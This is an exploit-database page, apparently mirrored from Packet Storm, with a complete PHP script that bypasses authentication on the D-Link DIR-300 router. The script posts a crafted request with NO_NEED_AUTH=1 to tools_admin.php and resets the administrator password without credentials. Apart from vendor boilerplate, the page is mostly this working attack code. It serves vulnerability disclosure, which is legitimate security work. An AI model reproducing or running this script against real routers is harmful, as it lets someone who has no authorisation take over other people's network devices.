Lucene search
K

D-Link DIR-300 Authentication Bypass

🗓️ 10 Nov 2010 00:00:00Reported by Karol CelinskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

D-Link DIR-300 Authentication Bypass with PHP Scrip

Code
`<?php  
if(sizeof($argv)!=4) {  
echo "Usage: php5 $argv[0] <router ip addres> <port>  
<admin password>\n";  
exit;  
}  
$ch=curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_PORT, $argv[2]);  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));  
echo "+ starting request\n";  
$out = curl_exec($ch);  
if($out===false) {  
echo "- Error: could not connect (  
http://$argv[1]:$argv[2]/tools_admin.php).\n";  
exit;  
} else  
echo "+ request sended\n";  
curl_close($ch);  
if(stripos($out,"login.php")===true) {  
echo "- something goes wrong (check answer - answer.html) !\n";  
$f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);  
exit;  
}  
else  
echo "+ ok, now you can login using l: admin p:$argv[3]\n";  
?>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Nov 2010 00:00Current
0.9Low risk
Vulners AI Score0.9
26